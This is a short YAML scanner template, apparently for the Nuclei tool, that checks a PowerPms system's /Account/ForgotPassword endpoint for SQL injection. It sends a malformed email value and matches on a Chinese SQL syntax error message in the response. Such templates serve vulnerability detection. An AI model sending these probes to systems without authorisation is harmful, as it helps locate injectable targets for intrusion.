id: PowerPms-ForgotPassword-sqli
info:
  name: PowerPms-ForgotPassword-sqli
  author: lemonlove7
  severity: high
http:
  - raw:
      - |-
        POST /Account/ForgotPassword HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3017.19 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 10
        
        email=%202
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - SQL语法错误，请联系管理员
          - \"success\":false
    matchers-condition: and
